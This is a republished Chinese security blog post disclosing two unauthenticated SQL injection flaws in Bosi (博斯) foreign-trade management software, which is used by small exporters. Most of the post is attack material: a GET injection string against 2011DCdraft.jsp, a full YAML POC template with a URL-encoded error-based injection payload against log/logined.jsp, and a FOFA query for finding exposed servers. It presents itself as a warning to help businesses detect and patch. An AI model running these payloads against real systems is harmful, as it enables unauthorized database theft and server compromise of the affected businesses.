发几个POC

admin
admin
admin
0
文章
0
评论
2025-12-25 02:56:07 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 针对小微企业外贸软件频遭攻击现状,本文公开博斯软件两处SQL注入漏洞POC,攻击者可借此窃取数据或控制服务器。同时提及致远泛微等系统风险,建议利用开源POC工具进行检测修复,以降低供应链安全风险。 综合评分: 80 文章分类: 漏洞POC,漏洞分析,WEB安全

cover_image

发几个POC

原创

搞安全的面具侠

搞安全的面具侠

2025年11月18日 15:17 北京

最近遇见一些公司出海的特别多,很多国内小微企业做生意都用的外贸软件XXX,而且我发现这类的外贸软件吧,更容易存在监管漏洞,因为涉及对外商贸信息的传输,甚至还有对外贸易结算,所以其实这类的市场不光是中国对外,不同的国家交易都是一个很大很大的市场空间,所以这两年就专门有黑客组织盯上了小微企业跨国交易、跨国贸易这些渠道,专打供应链,一打打一片,而且基本上损失少则几万,多则几十万,这些小微企业软件被黑导致的经济损失绝大部分,99.999999%(通过最近接手的十几个案例来分析出来的,没一个知道问题在哪,出问题之后该怎么办的)都不知道咋办,选择息事宁人吃哑巴亏,即便报警,案件金额小涉及不同国家地区也都是不了了之,所以就发几个有关外贸软件的POC!

1.博斯外贸管理软件 2011DCdraft.jsp 存在SQL注入漏洞

漏洞描述:博斯外贸管理软件 2011DCdraft.jsp接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

PoC代码:GET/crm/module/2011DCdraft.jsp?c_ex1=1’and+1=@version–HTTP/1.1

2.博斯外贸管理软件V6.0 log/logined.jsp SQL注入

漏洞描述:博斯外贸管理软件V6.0 log/logined.jsp 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 fofa: title=”欢迎使用 博斯软件”

PoC代码[已公开]:

id: sibo-v6-logined-sqli

info:

  name: 博斯外贸管理软件V6.0 log/logined.jsp SQL注入

  author: zan8in

  severity: high

  verified: true

  description: |-

    博斯外贸管理软件V6.0 log/logined.jsp 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

    fofa: title=”欢迎使用 博斯软件”

  reference:

    – https://mp.weixin.qq.com/s/SP7sWzgFrVmZfINWCqOZIw

  tags: sibo,sqli

  created: 2024/12/31

rules:

  r0:

    request:

      method: POST

      path: /log/logined.jsp

      body: Submit=-1&account=-1&password=1%27+AND+9085+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%289085%3D9085%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29+AND+%27GSSe%27%3D%27GSSe

    expression: response.status == 200 && response.body.bcontains(b”qxpkq1qvxpq”)

expression: r0()

此外,还有这些也存在漏洞,但是没有POC,感兴趣的网友可以发过来验证一下呢。

除此之外,还有很多致远啊、泛微啊等等POC,想了解更多的可以去github上面follow一下神经蛙,他有个工具里面都是POC,可以下载下来做检测或者是打补丁均可,都是最新的,11月份新发的,之后也在不断更新呢

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:搞安全的面具侠 搞安全的面具侠《发几个POC》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  2